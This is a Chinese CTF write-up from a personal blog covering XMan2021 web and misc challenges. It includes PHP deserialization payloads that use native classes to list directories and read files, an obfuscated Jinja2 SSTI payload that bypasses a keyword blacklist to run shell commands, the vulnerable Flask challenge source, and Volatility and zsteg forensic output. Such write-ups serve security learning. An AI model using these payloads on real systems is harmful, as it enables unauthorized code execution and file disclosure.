CTF笔记(十七)——XMan2021 WEB & MISC WP

内容纲要

XMan2021

easyphp

这个反序列化是原题,利用php原生类

原题:

[DASCTF]ez_serialize-PHP 原生类的利用_cjdgg的博客-CSDN博客

PHP内置类的遍历
get_declared_classes();

使用 Error/Exception 内置类进行 XSS
Error 内置类
Exception 内置类
使用 Error/Exception 内置类绕过哈希比较
Error类
Exception 类
使用 SoapClient 类进行 SSRF
SoapClient 类
使用 SoapClient 类进行 SSRF
使用 SimpleXMLElement 类进行 XXE
SimpleXMLElement 类
使用 ZipArchive 类来删除文件
ZipArchive 类
PHP 原生文件操作类
可遍历目录类
DirectoryIterator 类
FilesystemIterator 类
GlobIterator 类
可读取文件类

SplFileObject

payload:

O:4:"XMAN":3:{s:5:"class";s:18:"FilesystemIterator";s:4:"para";s:13:"/var/www/html";s:5:"check";N;}

O:4:"XMAN":3:{s:5:"class";s:13:"SplFileObject";s:4:"para";s:37:"/var/www/html/xxxXXXmMManNNn/f1a4.php";s:5:"check";N;}

SSTI

原题,网上很多WP都抄来抄去的,没有营养

我的payload:

% print(lipsum.__globals__['__bui'+'ltins__']['ev'+'al']('__imp'+'ort__("o'+'s").po'+'pen("cat /flag_1s_Hera").read()')) %

源码

#!/usr/bin/env python
# -*- coding: utf-8 -*-
from flask import Flask, render_template, render_template_string, request

app = Flask(__name__)

@app.route("/", methods=["GET", "POST"])
@app.route("/index.php", methods=["GET", "POST"])
def index():
    def safe_filter(s):
        blacklist1 = ["{import","{getattr","{os","{class","{subclasses","{mro","{request","{args","{eval","{if","{for","{subprocess","{file","{open","{popen","{builtins","{compile","{execfile","{from_pyfile","{local","{self","{item","{getitem","{getattribute","{func_globals","{config"]
        blacklist_strong = blacklist1 + ["{{", "}}"]
        for no in blacklist_strong:
            if no in s:
                return "1"
            else:
                continue

        blacklist = ["import","getattr","os","class","subclasses","mro","request","args","eval","if","for"," subprocess","file","open","popen","builtins","compile","execfile","from_pyfile","local","self","item","getitem","getattribute","func_globals","config"]
        for no in blacklist:
            while True:
                if no in s:
                    s =s.replace(no,"")
                else:
                    break
        return s
    if request.method == "POST":
        name = request.form["name"]
        template = "hello {}!".format(name)
        name1 = render_template_string(safe_filter(template))
        print name1
        if name1 == "1":
            template1 = u"""
            <strong>Parse error:</strong> syntax error, unexpected T_STRING, expecting "{" in <strong>\\var\\WWW\\html\\test.php</strong> on line <strong>13</strong>
                """
            return render_template_string(template1)
        else:
            return render_template("index.html", name=name1)

    if request.method == "GET":
        return render_template("index.html")

if __name__ == "__main__":
    app.run(host='0.0.0.0', port=80, debug=False)

volatility

> .\volatility.exe -f mem --profile=WinXPSP2x86 cmdscan
Volatility Foundation Volatility Framework 2.6
**************************************************
CommandProcess: csrss.exe Pid: 600
CommandHistory: 0x2e3a508 Application: cmd.exe Flags: Allocated, Reset
CommandCount: 18 LastAdded: 17 LastDisplayed: 17
FirstCommand: 0 CommandCountMax: 50
ProcessHandle: 0x198
Cmd #0 @ 0x55b548: cd C:\Documents and Settings\Administrator\??\MISC
Cmd #1 @ 0x2dd7a20: winpmem_v3.3.rc3.exe -dd -o memdump.raw --format --volume_format raw
Cmd #2 @ 0x55b8a8: winpmem_v3.3.rc3.exe -dd -o memdump.raw --format raw  --volume_format raw
Cmd #3 @ 0x55b3f0: can you find this?
Cmd #4 @ 0x5524b8: yes
Cmd #5 @ 0x2e39400: please go on
Cmd #6 @ 0x2e39a80: haha
Cmd #7 @ 0x2e01170: flag is down
Cmd #8 @ 0x2e02110: flag{xixixixix_Llalala_leizeNiuBi}
Cmd #9 @ 0x2e02f60: winpmem_v3.3.rc3.exe -dd -o memdump.raw --format raw  --volume_format raw
Cmd #10 @ 0x2e3a130: waw
Cmd #11 @ 0x2e3a1d8: jpg?????????????????????????????????????????????????
Cmd #12 @ 0x2e3dd80: ?
Cmd #13 @ 0x55b878: nonono it is png
Cmd #14 @ 0x55c778: just check the pixel!
Cmd #15 @ 0x55d1d8: !!!!!!!
Cmd #16 @ 0x2e3a028: !!!!!!
Cmd #17 @ 0x2dd7ad0: winpmem_v3.3.rc3.exe -dd -o memorydump.raw --format raw --volume_format raw
**************************************************
CommandProcess: csrss.exe Pid: 600
CommandHistory: 0x2e3ad88 Application: winpmem_v3.3.rc3.exe Flags: Allocated
CommandCount: 0 LastAdded: -1 LastDisplayed: -1
FirstCommand: 0 CommandCountMax: 50
ProcessHandle: 0x624
>.\volatility.exe -f mem --profile=WinXPSP2x86 filescan | findstr 'png'
Volatility Foundation Volatility Framework 2.6
0x000000000a283498      1      0 R--rwd \Device\HarddiskVolume1\Documents and Settings\Administrator\???\MISC\res.png
0x000000000a365cb0      1      0 RW-rw- \Device\HarddiskVolume1\Documents and Settings\Administrator\Recent\res.png.lnk
0x00000000a3436498      1      0 R--rwd \Device\HarddiskVolume1\Documents and Settings\Administrator\???\MISC\res.png
0x00000000a3bc9cb0      1      0 RW-rw- \Device\HarddiskVolume1\Documents and Settings\Administrator\Recent\res.png.lnk

zsteg

zsteg *.png --all
[?] 3101 bytes of extra data after image end (IEND), offset = 0xa93e3
extradata:0         .. ["\x00" repeated 3101 times]
imagedata           .. file: SVr4 curses screen image, big-endian
b2,r,lsb,xy         .. file: VISX image file
b2,r,msb,xy         .. file: 5View capture file
b2,bgr,lsb,xy       .. file: PGP Secret Sub-key -
b3,bgr,lsb,xy       .. file: MPEG-4 LOAS
b4,r,lsb,xy         .. text: "wwwwfeUDDDDDeTC23333\"\"\"\"\"\"\"\"3333\"\"\"\""
b4,r,msb,xy         .. text: ["D" repeated 8 times]
b6,bgr,msb,xy       .. file: PGP Secret Sub-key -
b8,r,lsb,xy         .. text: "\"\#$$$%%%&&&&&&&&))))))))********,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,-./0000/////////////////////////"
b8,r,msb,xy         .. text: ["8" repeated 8 times]
b1,r,msb,xy,prime   .. file: Apple DiskCopy 4.2 image \3620GO\003<, 2029788928 bytes, 0x38000000 tag size, 0xfe encoding, 0xff format
b4,r,lsb,xy,prime   .. text: "wuDB3\"32 "
b4,r,msb,xy,prime   .. text: ";3333333"
b8,r,lsb,xy,prime   .. text: "$%&))*,,,,,00////44444444444455555555554444555442200000-----///-----------,,,,,,,,,,,,,,,///////000000000000222222222222222224220/,,,,,%$#"
b8,r,msb,xy,prime   .. text: ["," repeated 12 times]
b1,b,lsb,yx         .. file: Zip archive data, at least v2.0 to extract
b2,r,lsb,yx         .. file: VISX image file
b2,r,msb,yx         .. file: 5View capture file
b2,b,msb,yx         .. text: "]UUUUUUUWUUW_]"
b2,bgr,lsb,yx       .. file: PGP Secret Sub-key -

不说点什么喵?

6 + 7 =

此站点使用Akismet来减少垃圾评论。了解我们如何处理您的评论数据